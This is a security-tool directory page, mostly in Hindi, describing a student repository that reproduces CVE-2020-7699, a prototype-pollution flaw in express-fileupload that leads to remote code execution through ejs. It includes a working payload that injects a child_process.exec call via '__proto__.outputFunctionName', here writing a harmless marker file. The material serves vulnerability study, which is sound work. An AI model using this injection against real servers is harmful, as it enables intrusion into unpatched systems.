Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2020-7699_reproduce — 针对 CVE-2020-7699 的复现,软件安全原理课程大作业 | Kitploit
उपकरण/GitHubGitHub/zodiac12-pub/cve-2020-7699_reproduce
Vulnerability AnalysisExploitationWeb Application ExploitationLearning & EducationPayload DevelopmentLabs & Practice
GitHubzodiac12-pub/cve-2020-7699_reproduce

CVE-2020-7699_reproduce

针对 CVE-2020-7699 的复现,软件安全原理课程大作业

रिपॉजिटरी देखें
4 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2020-7699 पुनरुत्पादन

Node.js RCE भेद्यता (CVE-2020-7699) का पुनरुत्पादन, मेरी प्रयोगशाला का कार्य

सेटअप

Node.js संस्करण: v14.16.1, कृपया सुनिश्चित करें कि Node.js का संस्करण 14 है (अन्य संस्करण शायद काम करेगा, मैंने परीक्षण नहीं किया)

Python संस्करण: 3.9.5, Python का उपयोग केवल HTTP हमला अनुरोध भेजने के लिए किया जाता है, किसी विशिष्ट संस्करण की आवश्यकता नहीं है

बस clone करें रिपॉजिटरी को, npm i चलाकर निर्भरताएँ स्थापित करें। मैंने 2 और कमांड दिए हैं:

  • npm run start-server का उपयोग करके लक्ष्य सर्वर (पीड़ित सर्वर) शुरू करें
  • npm run launch-attack का उपयोग करके हमला शुरू करें

विश्लेषण

express-fileUpload: 1.1.10 से नीचे का संस्करण प्रभावित होगा

express-fileUpload में प्रोटोटाइप प्रदूषण मौजूद है

भेद्यता: express-fileUpload प्रोटोटाइप प्रदूषण

इसका उपयोग कैसे करें: __proto__.outputFunctionName को प्रदूषित करें ताकि निष्पादित करने के लिए कमांड लिख सकें। उदाहरण: echo "ATTACK SUCCESSFUL" > attacked.txt

root@kitploit:~
exec_command = "echo \"ATTACK SUCCESSFUL\" > attacked.txt"

{
    "__proto__.outputFunctionName": (
        None,
        f"x;process.mainModule.require('child_process').exec('{exec_command}');x"
    )
}

ejs में RCE मौजूद है

भेद्यता: ejs xxx.outputFunctionName को निष्पादित करने का प्रयास करेगा जो undefined है, लेकिन यदि object.outputFunctionName प्रदूषित है, तो वह इसके बजाय इसे निष्पादित करेगा

टूल डाउनलोड करें